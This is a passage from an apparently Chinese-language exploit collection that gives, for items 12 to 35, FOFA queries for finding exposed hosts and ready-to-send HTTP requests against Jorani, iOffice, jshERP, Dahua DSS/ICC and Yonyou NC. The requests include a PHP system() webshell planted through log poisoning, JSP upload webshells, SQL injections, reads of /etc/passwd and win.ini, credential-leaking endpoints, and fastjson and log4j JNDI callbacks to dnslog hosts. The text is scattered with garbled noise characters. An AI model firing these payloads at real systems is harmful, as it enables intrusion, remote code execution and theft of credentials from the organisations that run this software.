# v9 P+ O/ D2 }9 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 l$ U1 b- {3 k+ g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; H) I8 P8 a! n, F% X; O% HAccept-Encoding: gzip, deflate* m+ C" V4 |( `+ ~% h* P
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8/ G) s j5 S7 Y
Connection: close* }' u* h8 M2 ?: _% n9 ~
: }. q- A! I% `6 h% o2 O2 G0 x
3 w2 J6 ^+ g6 {4 `9 Z8 @/ R
12. Jorani < 1.0.2 远程命令执行. |: ?* m6 v% g$ D
FOFA:title="Jorani"2 s; |% a; Z4 p; U, P" A
第一步先拿到cookie+ J3 I1 Q3 a3 M' Z, P9 y
GET /session/login HTTP/1.1$ E" N8 Q2 v% N+ q2 w9 z
Host: 192.168.190.30
4 S: S9 X! g7 x$ V$ H8 Y- v3 B4 sUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
4 v/ f. M9 q, O# h4 KConnection: close/ v8 F0 W2 G: V0 ?2 Y" j
Accept-Encoding: gzip
' V7 r7 J$ @# Q; k/ }. B ]8 J. h# c0 u( |9 \8 ~+ {
8 N8 o& y% Z: t0 E6 K* E
响应中csrf_cookie_jorani用于后续请求
, B' @+ l& B0 l; ^HTTP/1.1 200 OK+ \) o3 q: [" u5 e5 l
Connection: close) p) h$ Q+ a. D2 w
Cache-Control: no-store, no-cache, must-revalidate8 I0 Q5 A8 ?- g6 |( u8 H1 v, p
Content-Type: text/html; charset=UTF-8& |" b6 A/ L0 L# h+ R
Date: Tue, 24 Oct 2023 09:34:28 GMT2 o# h9 H! z. p5 {2 T4 d. ^; T
Expires: Thu, 19 Nov 1981 08:52:00 GMT
8 E0 S1 t1 C- ~$ }& u$ bLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT, F& e. w$ M# t- h9 J" M: H* B
Pragma: no-cache4 q3 n" f+ m+ Q0 H" U
Server: Apache/2.4.54 (Debian)
" j0 O4 y9 _. w3 y! J+ M4 \Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
. Y$ L( {) Q( gSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
- S: j% L- x8 b3 z) u0 f1 @) ~Vary: Accept-Encoding+ K: k" E5 b. J$ P
* g1 c7 |) O# y' E( q6 p
% D! x4 u/ h2 B3 F: c
POST请求,执行函数并进行base64编码
3 u% s5 I5 k6 [& |POST /session/login HTTP/1.1 ?9 j4 Q6 c: W3 R
Host: 192.168.190.30
/ ?* v# d1 G" j T6 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36& d4 P% m. d% r6 |4 z2 q' G
Connection: close
5 w3 O P8 \3 T9 s6 qContent-Length: 252/ T% h7 _0 t# X! V1 u8 G" X
Content-Type: application/x-www-form-urlencoded
: S* a0 d" d! @$ N" f, e+ LCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r. \% i: G% V, @- i* ?+ f
Accept-Encoding: gzip* V% E2 W. O5 }
* a% @5 c& L$ T+ x' G: qcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor" p: T3 Q' N" F7 l$ _6 R
% Y& I: s7 o1 l! f$ P% S
: d6 ~/ ^' c) x: \+ i
; ]1 H+ N( n" |, n |
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
; w9 T) H6 ^/ [4 \1 O3 _GET /pages/view/log-2023-10-24 HTTP/1.1 Z8 R8 W+ ?' T5 j: Y9 s
Host: 192.168.190.30) E6 K3 e- {; o4 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36) r4 u) A# B2 z- x4 V
Connection: close" o/ ^/ K' {9 A+ U0 G( z5 a
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r0 K7 W- a! g/ x: u( l
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=( b' {7 X& w1 a5 d
X-REQUESTED-WITH: XMLHttpRequest
8 K6 R; ]5 M& z$ b$ v& Y7 v- ~Accept-Encoding: gzip9 ?+ `3 _- n( b) [/ l) A- c
* V# Z) v& u8 H1 H
$ s* C* T& e( h3 I u8 i' Q13. 红帆iOffice ioFileDown任意文件读取
* I X2 y) O: e7 n- v% ZFOFA:app="红帆-ioffice" B+ D9 f! |7 u6 ?
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1; x C* F1 Y' K3 @
Host: x.x.x.x, B$ V3 @" C. [% H( x6 J
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.363 _4 O @2 }9 ^5 B
Connection: close7 b+ [* {; ?# A; b6 {! _9 _; H, y0 x
Accept: */*
0 `9 p: Z" [; {8 z- ~/ YAccept-Encoding: gzip1 ]5 p! d) ]7 R a
. b: L! B) K- E# U# ]7 y. b
, A! s6 x8 @, F" c; d14. 华夏ERP(jshERP)敏感信息泄露
% g& Q# j6 ?; ?0 {$ R+ EFOFA:body="jshERP-boot"
+ @! r& q) f$ S4 g1 v1 _泄露内容包括用户名密码+ w1 y) H/ E4 o5 r
GET /jshERP-boot/user/getAllList;.ico HTTP/1.16 i9 U$ m6 S& c. j; \% ]
Host: x.x.x.x1 `6 Z* N1 N/ J1 C. h$ N a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
( X' o8 z7 ~9 B2 d0 t& D$ vConnection: close: Z7 b9 r6 E7 G8 H% k
Accept: */*
7 t, }8 C- s, j" s O+ AAccept-Language: en j6 ]; F) f# I
Accept-Encoding: gzip
/ D1 C' C# V7 x7 b9 f
- c5 M; s; O( y1 X% d) a9 `/ l* H' G# p/ j2 k4 Q
15. 华夏ERP getAllList信息泄露
) @8 n" h" _4 c# WCVE-2024-0490
8 C6 V4 Z7 B3 z7 O3 aFOFA:body="jshERP-boot"/ I% O+ S( |, e
泄露内容包括用户名密码
; x+ k) t/ |, N- Y. K6 vGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
# V2 F" ]2 ^, m) `Host: 192.168.40.130:100+ P& r0 {9 z2 N: R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
* Q- `1 B( i( C- bConnection: close
( [. ^, Z: ?# V4 o$ OAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.83 X) _- d1 V( a" a
Accept-Language: en
$ t+ ?' s0 ~. J8 `8 h6 X) nsec-ch-ua-platform: Windows
* l0 @7 I. f' @# T( r! PAccept-Encoding: gzip! u! {' j% E+ i
) H0 E! q8 ?, m5 y {! Z' A3 N
) S! w% k e4 c8 [8 n0 `16. 红帆HFOffice医微云SQL注入
5 d1 n" d" ^! `FOFA:title="HFOffice"! v* O; x( g) S+ c m" Z
poc中调用函数计算1234的md5值
# ?8 |9 s5 \/ I9 P2 y! iGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
/ U- ^' n4 y( w) C( S5 pHost: x.x.x.x
) ^& u* b, _* \* P3 \User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
' h2 l' e; E* V0 [8 LConnection: close9 A8 L5 J; n' M' @/ u& j7 l2 g
Accept: */*0 J) l$ _! a! w5 J* i: V4 Y
Accept-Language: en8 Z2 ?6 q9 d8 o' F2 z, H
Accept-Encoding: gzip
" f' \8 q2 k9 `# s9 U9 @
u; W5 ]( n+ w: W6 o
# v2 P/ y$ }2 X, X. n7 q( J A17. 大华 DSS itcBulletin SQL 注入/ g9 F ~9 i) D( F2 K$ m
FOFA:app="dahua-DSS"# j/ v, g2 I7 N
POST /portal/services/itcBulletin?wsdl HTTP/1.1 n& r. L8 c$ v$ W3 Q5 j" m: o
Host: x.x.x.x
& A3 A5 L- X5 P* SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# C( R9 t3 P( Y
Connection: close
: k @' R. d+ H1 v' }Content-Length: 3458 F# r# M' G# _/ j5 l
Accept-Encoding: gzip! m5 A* Y. C$ S! O* _4 X" b
# W u1 }9 F+ W" A
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>& k7 {6 s3 s; `' w4 ^
<s11:Body>0 }& W$ H7 ?0 y$ N8 E
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
e0 I% q9 v# ^1 F <netMarkings>
% n" B" f8 R6 X9 i0 W& s* c& f (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1* P+ h% ^# Q% G2 E
</netMarkings>) F+ J6 i( m. G
</ns1:deleteBulletin>8 W0 b" y8 v2 C+ j7 j/ Y, b$ Z
</s11:Body>
! ^/ Z% h! ]+ ^. {8 M</s11:Envelope>7 P d/ u% f' d' m% [
: q$ s/ I$ F3 l4 q) @
9 z/ B" D& H1 J: f3 O4 E, Y1 P3 f2 ?, ?
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
$ k" ^3 Z1 m7 J( VFOFA:app="dahua-DSS"
$ L8 T% U9 i9 s- m3 A5 t2 }7 ~. LGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
. {5 }7 U# v9 lHost: your-ip
7 ?7 L# z: I; n3 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' y( n! o3 J+ m* f* f
Accept-Encoding: gzip, deflate
1 l2 ^4 L+ X1 N) Z$ V/ WAccept: */*
- l3 o- y. ~/ h, `; t: A- Y+ pConnection: keep-alive# ~* P! |2 ^4 s3 a: f, _+ p6 b
9 k: T, t1 l. F' |' e$ u
. E/ f0 I8 K2 V) c9 D5 U) y! G7 F
& T0 P- ~5 S7 a19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
; C3 `' |* l0 s/ G0 CFOFA:app="dahua-DSS"
1 ~+ j) x% J' S% g' C% ^GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
. P- \7 _3 e/ Q6 pHost:
4 Q% z- J6 ]) ]2 G/ n2 |User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.365 r9 c% }# m' \& }, h( [0 d7 W" L
Accept-Encoding: gzip, deflate: n+ u `& X6 h( y7 }7 n0 b
Accept: */*
$ [/ i6 ]+ W) R+ w6 P' TConnection: keep-alive
7 w( s9 h& Y- L3 Z7 B) i
0 c$ q5 ^ Z( v6 X4 I5 \) t2 C4 T: V* \8 E7 V3 F
20. 大华ICC智能物联综合管理平台任意文件读取# R$ Z7 u8 I) d/ A" n" O
FOFA:body="*客户端会小于800*"
4 T( N/ u- ]8 gGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
( z5 M$ w6 d r7 S7 DHost: x.x.x.x
1 g3 L! V4 D. ~% g! SUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ d9 D9 ]# ]4 g: Q+ p; q0 c. RConnection: close
. ~9 S( _1 M7 ~% uAccept: */*
: N6 C) C6 p7 o& M- nAccept-Language: en% Z! v4 h; I1 l/ U
Accept-Encoding: gzip6 l6 `' S3 L/ _+ W9 u% O7 i$ X
) m& D, `& N' X* A. P1 o: h; H
% X6 O/ f# e$ P' b# \ b) r+ s21. 大华ICC智能物联综合管理平台random远程代码执行
& X' S- G8 s5 T" v; }FOFA:icon_hash="-1935899595"
7 x) v& o& Q! S1 _6 ]6 EPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
1 H" U$ {3 w/ s( ] Q4 }Host: x.x.x.x
' q- ~, n% A3 U) i x; S& UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& D; A, a0 b% ZContent-Length: 161. u# y4 r6 G, ?; _3 y8 b& e
Accept-Encoding: gzip; I" H3 q, y' O( Q4 _# w
Connection: close) q1 `; I, E) ?$ H
Content-Type: application/json;charset=utf-8& F6 `& Z7 ?1 z9 I; m( {5 _
/ E# E5 p% R) l/ A, C{
& V( G; D: e) l/ M6 J& N% E"a":{9 W h% d9 L) h3 R+ j# F
"@type":"com.alibaba.fastjson.JSONObject",7 z# M6 I/ s3 |
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}5 H6 |, C; _8 w) |
}""
0 _8 v/ c1 p8 A h% h}
- [: t6 k& i) J, M7 X' n, ^' M. L: _! y0 Q! [/ s$ P$ Z
3 ?* N: M! G) M- j [ ]22. 大华ICC智能物联综合管理平台 log4j远程代码执行, c/ h o3 V" P' z: ]
FOFA:icon_hash="-1935899595"
, H/ C3 E t1 z9 gPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1 P' a6 l! a. E1 j s; d! v4 k
Host: your-ip6 y* g' J# [3 H( U4 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 P- l0 S$ N" d6 V
Content-Type: application/json;charset=utf-8
) H* M, V/ @5 ^- x1 r" W* X0 p; w+ m2 p% Q) y$ f
{
8 R n! G* r1 @: u5 w! ^9 T"loginName":"${jndi:ldap://dnslog}"
0 w" g: Z6 _$ v$ f3 m5 ?}5 ]3 A$ }, k0 P' g9 l8 o
8 }/ ~6 N: m0 g& }! x1 h0 u k0 |% [& n) Z" Z
' B: r9 I# D5 o6 R
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
- w- v( Y" ^8 ?0 \! ` u& _FOFA:icon_hash="-1935899595"
) O4 X+ s# {6 a' E0 P" f$ CPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
! O2 \# n6 V! \5 F0 \4 PHost: your-ip9 s$ G3 ~( H: N# y1 O; i( w1 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 S7 c+ q2 A) ]
Content-Type: application/json;charset=utf-8) D" E; b& w* h1 F
Accept-Encoding: gzip
% D1 ?% I8 Y& ?8 s4 ~, |Connection: close
7 @ A& E( O$ U
8 @. j+ H4 ?& { d/ a7 K& Y- ~, X{; V3 \7 A! r, ^( ?2 I' U
"a":{
4 `2 e% z& r4 m' g3 l "@type":"com.alibaba.fastjson.JSONObject",, T/ {# d( {' t3 q- F
{"@type":"java.net.URL","val":"http://DNSLOG"}
6 g5 P- q# w5 d( m, [0 j }"") L3 B9 \5 O3 k) H& W
}
- h3 H: a; t @* d9 d
; O T6 a7 b8 u& m1 V% u
( \% ?/ a7 b' s) |* E! E, U# d24. 用友NC 6.5 accept.jsp任意文件上传
- |' h' }% r9 \0 GFOFA:icon_hash="1085941792"1 @5 k8 a# z/ b- D
POST /aim/equipmap/accept.jsp HTTP/1.1
" k: I! I U) q$ nHost: x.x.x.x) ^1 J, d4 a$ d7 Q
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36- x+ _% \6 }. s0 t
Connection: close
) Y* s0 [/ x/ c5 O( c0 oContent-Length: 449
: U6 E% R3 H( _+ D/ _Accept: */*. A/ @2 m8 z" H3 Q
Accept-Encoding: gzip# Z( i# e, x8 G6 I
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc# @1 I* ?7 K/ q, X
8 }- Q- |: ~7 g* c) Z& ^-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
( D- z. k( E U! u7 O( K' VContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"6 `9 S8 @' F) g4 x: f* F8 G6 o5 a/ J
Content-Type: text/plain
" ^) q8 u" b: w& J! J& t1 Y# T [& U, D+ Y" M E
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>- a% r. [0 V2 t- j. o
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc6 @* @: _* T0 a$ T+ t. |
Content-Disposition: form-data; name="fname"
# Q6 ~* ^- H* u0 I' T+ T" O' t; ?( W+ o3 u. E. X
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
$ K4 f; o2 j5 ^- B& U-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
+ k3 T+ b/ C/ P1 G) x1 a. G+ V3 E% r0 u; T. Q% g* P2 [1 A. G
P# \- M6 O! V! ^$ h( ^7 N5 ~25. 用友NC registerServlet JNDI 远程代码执行: A, h# m6 B( S2 P0 c; P+ K
FOFA:app="用友-UFIDA-NC": i8 S. [, ~( e% t
POST /portal/registerServlet HTTP/1.10 S. Z8 l5 c% }2 L0 r/ O
Host: your-ip( X9 B1 @! _, i" S: I% W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
- h# b8 [2 N; f4 e1 n% K# bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
5 N& j [' D/ v) U& pAccept-Encoding: gzip, deflate# e0 U9 J, J) V# D! ?* ] D2 ]
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6- s! C9 [' \9 l- H
Content-Type: application/x-www-form-urlencoded% M0 _6 [! j/ D; Q2 z* M7 G. ]0 _
' e9 f |3 |- u: {, p
type=1&dsname=ldap://dnslog
: w: U' N. w \/ T
; _9 d: Q1 X( N5 R$ Z
5 f3 K# {2 C# z1 e( t* ?
% _: G6 I9 N6 M: O; z26. 用友NC linkVoucher SQL注入; K. f5 N$ `- F& z7 A. [3 ^
FOFA:app="用友-UFIDA-NC"% e# i2 Y8 c+ p; t5 ~5 Q
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.15 s9 Z m- r) Y. i7 u Y. Q
Host: your-ip
8 l* f. N2 I3 o7 Y6 m: `4 q1 J& cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 J% N9 J$ g" A6 k/ O( M* nContent-Type: application/x-www-form-urlencoded5 v _' W$ H2 O6 t8 N8 w
Accept-Encoding: gzip, deflate( {6 ]: {0 N" G) V2 B1 z
Accept: */*' M, E# [$ S6 E
Connection: keep-alive
! i. ?3 c- h: D, ?4 r2 D) ?* z* I% u Z
. a# x0 N3 ^5 q27. 用友 NC showcontent SQL注入
+ V' d" Q( a4 l( f" mFOFA:icon_hash="1085941792"
$ Y( z, M5 ^% s8 HGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1! E$ q: N( {5 H' ~2 B9 H
Host: your-ip
2 ^! y) J, B9 k R, ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 N) W4 s! A. D5 l- r( i) p) d
Accept-Encoding: identity4 t, l# b! H7 a8 c$ u* N
Connection: close, {& I# Z0 j4 s. U
Content-Type: text/xml; charset=utf-8) r4 V- P/ b1 o3 L) \; v% N
+ s* q6 _' d# u* G' N& C. K1 n3 H
# D4 x9 b' B q! g* \28. 用友NC grouptemplet 任意文件上传. w* R" A/ s, D
FOFA:icon_hash="1085941792"
, j" Q6 q' X+ c% Q& RPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
3 {( ]/ X* D' \; t7 ~1 X3 \Host: x.x.x.x- q) U( `4 n! y7 a; k% j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 h2 g& x/ W8 [3 ~4 Z' ?: A! S5 O
Connection: close
9 w$ F7 {$ x! _. W W9 AContent-Length: 268
5 q7 V* d9 U3 R9 lContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk5 w, p9 I3 I \/ s& A% S3 y m
Accept-Encoding: gzip' E$ a! N, b0 ]- z" H8 U
6 {1 A7 S, A1 F* ?) q# _- e/ C2 ]------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk* B& |- r( \2 a: v8 C
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"1 w/ @8 X: k/ w) J
Content-Type: application/octet-stream
9 H, @7 p" b# C0 Q/ {2 g" z* f% Q; t* H- M
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
, Y3 c, H3 h+ O) G------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--( e& T4 h" `7 S5 U/ c! L# J9 |
V0 v8 `# a% [, [
1 E" I. h& r' V2 H6 s
/uapim/static/pages/nc/head.jsp" {6 C( l9 P+ c& F* a5 N
1 _7 r: r% M* D% v5 k29. 用友NC down/bill SQL注入2 o! M" L) R: O
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"' z& O6 f8 y( d5 I. t. q& S
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
$ U2 P' [; _& H/ @) NHost: your-ip8 j; V5 I: y0 K* A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 G" J3 e. ~' z8 I! lContent-Type: application/x-www-form-urlencoded
; j, h! s0 X' S. Z5 O/ ^Accept-Encoding: gzip, deflate
. V3 H$ p2 X" d/ W$ wAccept: */*' n0 X, \# U! h, d& t
Connection: keep-alive
* g- I1 u; {4 Z- F! Z! b* c4 |& H
4 L1 A- t! m& ^# K4 i, x
# d2 G! \3 D% j+ C& _30. 用友NC importPml SQL注入$ t( ]( ], z5 c7 K; L3 l0 `
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
& t& o7 t; N$ L% B8 d* wPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
3 f" Q5 }) ?8 B: y1 i" }9 [& O1 f. ~. eHost: your-ip
3 G9 w z9 [- u5 T# K9 nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
- A7 A( c, R" e; xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
$ ^" c; o% p# x0 j2 n/ S0 DConnection: close% B* w, t; v( L+ E
" y' g6 \8 O) ~9 u------WebKitFormBoundaryH970hbttBhoCyj9V' v( F, Y1 E: t9 ]2 y5 w& a
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
) w( u, r7 ^4 F2 f7 ^! B/ u2 Z0 cContent-Type: image/jpeg2 j! e4 P) r' L' M( v) U- }
------WebKitFormBoundaryH970hbttBhoCyj9V--. f( N- ^ H. i# C0 {
6 n' X, A0 R+ z, f& l# [
* h2 ], h; @ x" Q31. 用友NC runStateServlet SQL注入
$ F5 @ E, M8 R% f5 }version<=6.5
; \4 d# r, y* }8 k- I; ^- aFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"! s- T( ^* p: v
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 b8 y% i0 Q9 V0 m% i P c$ SHost: host1 J! h# [# B8 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
" [5 x/ y0 l8 V0 J$ Q0 ]Content-Type: application/x-www-form-urlencoded
2 H, |) v% Q) J3 U6 G/ |8 k. _1 _0 N2 f
) | H* T3 n3 T9 t0 ]
32. 用友NC complainbilldetail SQL注入+ ~. r# B9 p% B* f- e$ q$ f7 Y5 s$ \" |
version= NC633、NC65
8 o* w. L* ~- }& `) y& }- ^FOFA:app="用友-UFIDA-NC"
) o6 m& I2 W* lGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1; k. l4 E# h( a5 w; n$ Q2 b
Host: your-ip
+ {0 f$ H. D) j. ?5 r, oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 u2 g& ^& F+ y) f0 Z
Content-Type: application/x-www-form-urlencoded0 C+ u, Q G( D, M7 m: D! G
Accept-Encoding: gzip, deflate3 n z# G" a& J" F5 k
Accept: */*
% L6 [' Q1 F6 A1 D' S" H/ W5 tConnection: keep-alive
, J& a& [. P" b( A5 `& C" o& `3 q* p$ W+ H: W ~( f
" \ l* i( H6 g% F5 Y
33. 用友NC downTax/download SQL注入& Z4 s: h& x' a5 ?0 a- R
version:NC6.5FOFA:app="用友-UFIDA-NC"
; z' ?' W9 i/ V& ^) y" r% lGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.10 ]5 O* Q2 p! W: u
Host: your-ip
R7 D2 x7 R! F5 J; h5 }4 A9 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' x$ e" q. V' p. w/ v$ SContent-Type: application/x-www-form-urlencoded
2 ^1 n4 ]; i0 X* RAccept-Encoding: gzip, deflate, A7 u6 J. N7 }4 H" n& N) N: \4 S
Accept: */*% O9 b; e4 M3 E4 b2 d. ]
Connection: keep-alive/ I8 k8 T) Y; H# T/ c( E
+ b( R& w( o0 h% {
3 D! a3 K0 D6 A% U' v
34. 用友NC warningDetailInfo接口SQL注入, w5 L5 ^8 V& {( G3 O
FOFA:app="用友-UFIDA-NC"
4 r$ A% q' T `GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. C' Z1 t; k- o' u: _1 j$ g- uHost: your-ip
" y1 i; v4 y1 M; t5 ~8 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ ]9 y" |* S, R# E* J! IContent-Type: application/x-www-form-urlencoded- A' v: V* b/ P& E4 Q
Accept-Encoding: gzip, deflate
0 _! H- r2 p9 uAccept: */*
' [3 ]& v+ k1 ~. P2 }9 uConnection: keep-alive4 P/ O0 ^ l7 }' y; ^
* C3 Y5 w$ f" U, t D/ w1 N4 O+ q
5 T; R( x: Q1 X' ~* ~9 \6 E35. 用友NC-Cloud importhttpscer任意文件上传
& i7 } A/ n7 \% Z4 G( TFOFA:app="用友-NC-Cloud"
3 z: R; W& B. v DPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
7 V" l3 y( {9 T1 }+ ]( S# w+ }Host: 203.25.218.166:8888
$ F* T* y0 x+ h; LUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
) I6 R R5 t8 A. s$ ?4 [- k. WAccept-Encoding: gzip, deflate) i- X1 s' v4 z# |4 |
Accept: */*6 `! r9 G6 K1 o9 C! x+ X
Connection: close
